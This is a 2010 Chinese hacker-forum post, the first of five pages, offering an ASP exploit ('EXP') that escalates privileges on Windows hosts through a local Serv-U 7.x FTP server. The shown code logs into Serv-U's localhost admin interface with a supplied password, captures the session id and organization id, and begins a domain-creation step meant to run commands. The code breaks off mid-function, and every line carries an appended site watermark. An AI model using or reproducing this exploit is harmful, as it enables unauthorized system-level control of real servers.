首页

新闻中心

安全文档

红客学院

下载中心

联盟原创

红盟论坛

支持serv-u 7.x的asp版本地提权
发表时间:2010-01-30 08:50:11 作者: 来源: 收藏本页

思路是沿用空虚浪子心(http://www.inbreak.net/?action=show&id=134)的提权方法,由于asp不支持操作socket,只能采用新建域再删除.程序界面是抄袭陆大的serv-u 6.X回显程序的,嘿嘿.由于本人菜,找不出serv-u 7.0的userid究竟是怎么变化的,所以只删除了域......  Jup中国红客联盟-全球最大的红客组织
serv-u 7.4连不上的原因找出来了,原来是7.0以上的版本新增加了域之后会延迟一段时间才启动.原来的exp可以正常使用.为了大家方便,在上面添了一句话,重新奉上.  Jup中国红客联盟-全球最大的红客组织

Jup中国红客联盟-全球最大的红客组织
EXP:  Jup中国红客联盟-全球最大的红客组织

<style type="text/css">  Jup中国红客联盟-全球最大的红客组织
<!--  Jup中国红客联盟-全球最大的红客组织
body,td,th {  Jup中国红客联盟-全球最大的红客组织
font-size: 12px;  Jup中国红客联盟-全球最大的红客组织
Jup中国红客联盟-全球最大的红客组织
-->  Jup中国红客联盟-全球最大的红客组织
</style>  Jup中国红客联盟-全球最大的红客组织
<%  Jup中国红客联盟-全球最大的红客组织
Function httpopen(neirong,fangshi,dizhi,refer,cookie)  Jup中国红客联盟-全球最大的红客组织
set Http=server.createobject("Microsoft.XMLHTTP")  Jup中国红客联盟-全球最大的红客组织
Http.open fangshi,dizhi,false  Jup中国红客联盟-全球最大的红客组织
Http.setrequestheader "Referer",refer  Jup中国红客联盟-全球最大的红客组织
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"  Jup中国红客联盟-全球最大的红客组织
Http.setrequestheader "Content-length",len(neirong)  Jup中国红客联盟-全球最大的红客组织
Http.setrequestheader "User-Agent","Serv-U"  Jup中国红客联盟-全球最大的红客组织
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"  Jup中国红客联盟-全球最大的红客组织
If cookie<>"" then  Jup中国红客联盟-全球最大的红客组织
Http.setrequestheader "Cookie",cookie  Jup中国红客联盟-全球最大的红客组织
End If  Jup中国红客联盟-全球最大的红客组织
Http.send neirong  Jup中国红客联盟-全球最大的红客组织
httpopen=bytes2BSTR(Http.responseBody)  Jup中国红客联盟-全球最大的红客组织
set Http=nothing  Jup中国红客联盟-全球最大的红客组织
end Function  Jup中国红客联盟-全球最大的红客组织

Function getmidstr(L,R,str)  Jup中国红客联盟-全球最大的红客组织
int_left=instr(str,L)  Jup中国红客联盟-全球最大的红客组织
int_right=instr(str,R)  Jup中国红客联盟-全球最大的红客组织
If int_left>0 and int_right>0 Then   Jup中国红客联盟-全球最大的红客组织
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))  Jup中国红客联盟-全球最大的红客组织
Else  Jup中国红客联盟-全球最大的红客组织
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"   Jup中国红客联盟-全球最大的红客组织
End If  Jup中国红客联盟-全球最大的红客组织
end Function  Jup中国红客联盟-全球最大的红客组织

Function bytes2BSTR(vIn)   Jup中国红客联盟-全球最大的红客组织
strReturn = ""   Jup中国红客联盟-全球最大的红客组织
For i = 1 To LenB(vIn)   Jup中国红客联盟-全球最大的红客组织
ThisCharCode = AscB(MidB(vIn,i,1))   Jup中国红客联盟-全球最大的红客组织
If ThisCharCode < &H80 Then   Jup中国红客联盟-全球最大的红客组织
strReturn = strReturn & Chr(ThisCharCode)   Jup中国红客联盟-全球最大的红客组织
Else   Jup中国红客联盟-全球最大的红客组织
NextCharCode = AscB(MidB(vIn,i+1,1))   Jup中国红客联盟-全球最大的红客组织
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))   Jup中国红客联盟-全球最大的红客组织
i = i + 1   Jup中国红客联盟-全球最大的红客组织
End If   Jup中国红客联盟-全球最大的红客组织
Next   Jup中国红客联盟-全球最大的红客组织
bytes2BSTR = strReturn   Jup中国红客联盟-全球最大的红客组织
End Function   Jup中国红客联盟-全球最大的红客组织
%>  Jup中国红客联盟-全球最大的红客组织
<%  Jup中国红客联盟-全球最大的红客组织
    ’----------自定义参数开始-----------  Jup中国红客联盟-全球最大的红客组织

action=Request("action")  Jup中国红客联盟-全球最大的红客组织
loginpass=Request.Form("loginpass")  Jup中国红客联盟-全球最大的红客组织
port=Request("port")  Jup中国红客联盟-全球最大的红客组织
mydomain=Request.Form("mydomain")  Jup中国红客联盟-全球最大的红客组织
path=Request.Form("path")  Jup中国红客联盟-全球最大的红客组织
ftpport = Request.Form("ftpport")  Jup中国红客联盟-全球最大的红客组织
user=Request.Form("user")  Jup中国红客联盟-全球最大的红客组织
pass=Request.Form("pass")  Jup中国红客联盟-全球最大的红客组织
cmd= Request.Form("cmd")  Jup中国红客联盟-全球最大的红客组织
sessionid=Request("sessionid")  Jup中国红客联盟-全球最大的红客组织
OrganizationId=Request("OrganizationId")  Jup中国红客联盟-全球最大的红客组织
userid=Request("userid")  Jup中国红客联盟-全球最大的红客组织
domainid=Request("domainid")  Jup中国红客联盟-全球最大的红客组织

    ’----------自定义参数结束-----------  Jup中国红客联盟-全球最大的红客组织

select case action  Jup中国红客联盟-全球最大的红客组织

case 1  Jup中国红客联盟-全球最大的红客组织
returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","http://127.0.0.1:"&port&"/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543","http://127.0.0.1:"&port&"/?Session=39893&Language=zh,CN&LocalAdmin=1","")  Jup中国红客联盟-全球最大的红客组织
sessionid=getmidstr("<sessionid>","</sessionid>",returns)  Jup中国红客联盟-全球最大的红客组织
if sessionid<>"" then  Jup中国红客联盟-全球最大的红客组织
Response.Write "login ok!"&"</br>"  Jup中国红客联盟-全球最大的红客组织
Response.redirect "?action=2&sessionid="&sessionid&"&port="&port  Jup中国红客联盟-全球最大的红客组织
else  Jup中国红客联盟-全球最大的红客组织
Response.Write "error!"&"</br>"  Jup中国红客联盟-全球最大的红客组织
end if     Jup中国红客联盟-全球最大的红客组织

case 2  Jup中国红客联盟-全球最大的红客组织
call main2()  Jup中国红客联盟-全球最大的红客组织

case 3  Jup中国红客联盟-全球最大的红客组织
returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1","",sessionid)  Jup中国红客联盟-全球最大的红客组织
OrganizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)  Jup中国红客联盟-全球最大的红客组织
OrganizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)  Jup中国红客联盟-全球最大的红客组织
if OrganizationId<>"" then  Jup中国红客联盟-全球最大的红客组织
Response.write "get OrganizationId "&OrganizationId&" ok!"&"</br>"  Jup中国红客联盟-全球最大的红客组织
Response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId  Jup中国红客联盟-全球最大的红客组织
                else 

 1/5    1 2 3 4 5 下一页 尾页
上一篇:1kb正向连接零管道后门代码
下一篇:下面没有链接了
快速链接
合作伙伴
Discuz官方站岁月联盟中国网管联盟HNC网络联盟交大蓝盾黑客动画吧
河南黑盟中国蓝客联盟绿色兵团溜客安全
友情链接
milw0rm骇安网能邦反病毒华夏黑盟鲁大师数据恢复红盟红色黑客联盟
中国黑客联盟黑蚂蚁安全网编程技术与维护安防快线反病毒小组Tosec安全组3.A.S.T小组
豫ICP备09015648号版权所有© 2001-2009中国红客联盟 All Rights Reserved.